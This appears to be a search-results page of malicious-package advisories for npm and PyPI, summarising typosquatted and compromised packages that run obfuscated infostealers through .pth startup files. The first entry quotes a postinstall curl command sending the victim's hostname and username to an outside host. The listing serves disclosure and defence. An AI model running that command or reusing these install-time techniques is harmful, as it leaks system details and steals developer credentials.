339 matches found
MAL-2026-5749 Malicious code in easy-time666 (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 57bc31746af3bff6006bfe2da34cd0fb223a4bd9e867abddd172be5018821c22 package.json declares a postinstall hook that runs curl http://npm.wdf1.eyes.sh/pre?h=$hostname&u=&whoami over plain HTTP on every npm install, leaki...
Malicious code in rlask (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: kam193 baacd735e23c83962845507427fa53c89bdc2e8e0456dbbce6f00a91bf4fe002 Typosquatting package published from a compromised account with an obfuscated infostealer. The infostealer is a heavily obfuscated JavaScript code executed usi...
Malicious code in rsquests (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: kam193 b32959e10bc6b1df57d105a5e5d74cbe7b69660cb7a1e78185d3f5e0e0f07e10 Typosquatting package published from a compromised account with an obfuscated infostealer. The infostealer is a heavily obfuscated JavaScript code executed usi...
MAL-2026-5322 Malicious code in phenopacket-store-toolkit (PyPI)
The package phenopacket-store-toolkit version 0.1.7 contains a malicious .pth file phenopacketstoretoolkit-setup.pth that executes a Bun-based credential stealer on every Python startup via CPython's site.py exec mechanism. The payload downloads the Bun runtime from the official GitHub release...
MAL-2026-5280 Malicious code in bramin (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 1fb2ac40fcb4626c5e7dea5e26951bc0965b39a1eb721c1a8f23846f421a5827 bramin ships a bramin-setup.pth file that Python auto-executes at every interpreter startup system-wide, not only when bramin is imported. The.pth...
Malicious code in pantheon-agents (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 1ee06d7aabbdf76969119c2f986e18bbc7f0dcac59ae9cae4f7a04798f2d083d The package installs pantheonagents-setup.pth into site-packages, which Python auto-executes at every interpreter startup broader than import-time,...
Malicious code in phenopacket-store-toolkit (PyPI)
The package phenopacket-store-toolkit version 0.1.7 contains a malicious .pth file phenopacketstoretoolkit-setup.pth that executes a Bun-based credential stealer on every Python startup via CPython's site.py exec mechanism. The payload downloads the Bun runtime from the official GitHub release...
Malicious code in magique-ai (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: kam193 6806267ad399a4b51411f5176e26470cccb7803dff5f0f6f1e3dca6e6c82170c Versions 0.4.4, 0.4.5 were compromised. Compromised packages start an obfuscated infostealer. The infostealer is a heavily obfuscated JavaScript code executed...
Malicious code in mflux-streamlit (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: kam193 27ef4c7f33e59dbe037d4b212286dd08cb7b1824c28c0032eb2d91db7a2b0174 Versions 0.0.3, 0.0.4 were compromised. Compromised packages start an obfuscated infostealer. The infostealer is a heavily obfuscated JavaScript code executed...
Malicious code in mrbios (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 8d1c97dced5d8f917e2e9901e0ed99fb0034bfafb5a3d46ad47eeba76a883c57 The package installs mrbios-setup.pth into site-packages. Python auto-loads.pth files at every interpreter startup, so the contained payload runs...
Malicious code in ensmallen (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: kam193 f844af5d6142ffdd36c3697ff26feabb3d79b6f75e5ac403d2ade6460023e04c Versions 0.8.101 were compromised. Compromised packages start an obfuscated infostealer. The infostealer is a heavily obfuscated JavaScript code executed using...
Malicious code in pyphetools (PyPI)
The package pyphetools version 0.9.120 contains a malicious .pth file pyphetools-setup.pth that executes a Bun-based credential stealer on every Python startup via CPython's site.py exec mechanism. The payload downloads the Bun runtime from the official GitHub release page, then runs an obfuscate...
Malicious code in ray-mcp-server (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: kam193 eae739a0cbe63099850e15e7ed9a72efd9d840d8cf003aa8c8dae1bb4c78a716 Versions 0.2.1 were compromised. Compromised packages start an obfuscated infostealer. The infostealer is a heavily obfuscated JavaScript code executed using B...
MAL-2026-5324 Malicious code in pyphetools (PyPI)
The package pyphetools version 0.9.120 contains a malicious .pth file pyphetools-setup.pth that executes a Bun-based credential stealer on every Python startup via CPython's site.py exec mechanism. The payload downloads the Bun runtime from the official GitHub release page, then runs an obfuscate...
MAL-2026-5283 Malicious code in okite (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 3cc7d54b0e30e24367551e3f19ab7387cf397cf9e1b5889c9f04ff871c771c38 The package installs okite-setup.pth, which Python auto-loads on every interpreter start. The.pth file contains a one-line obfuscated exec of a strin...
MAL-2026-5300 Malicious code in funcdesc (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 4a5756a79331cdda67721e39889609f5c0b5e342b678dbce2de97c94ec2dbe29 The package installs funcdesc-setup.pth, which Python auto-executes at interpreter startup for any environment where this package is installed. The.p...
Malicious code in uprobe (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 82230ac4ef4464e9696491bf25cfabbd5cff78ab2256f4aa1a0d5ad7456218a8 The package installs uprobe-setup.pth, which Python auto-loads at every interpreter startup in any environment where the wheel is present. The.pth...
Malicious code in spateo-release (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: kam193 21400e8510d0663de6c3a4454fe99d9200cb83ae8d1ecdc137c99f3668da4293 Versions 1.1.2 were compromised. Compromised packages start an obfuscated infostealer. The infostealer is a heavily obfuscated JavaScript code executed using B...
MAL-2026-5323 Malicious code in ppkt2synergy (PyPI)
The package ppkt2synergy version 0.1.1 contains a malicious .pth file ppkt2synergy-setup.pth that executes a Bun-based credential stealer on every Python startup via CPython's site.py exec mechanism. The payload downloads the Bun runtime from the official GitHub release page, then runs an...
MAL-2026-5274 Malicious code in dynamo-release (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: kam193 a4e35bea632f7363e7a1cc6ccbfb9227eca2c4720b0a689edc1bc3ce64c9d85c Versions 1.5.4 were compromised. Compromised packages start an obfuscated infostealer. The infostealer is a heavily obfuscated JavaScript code executed using B...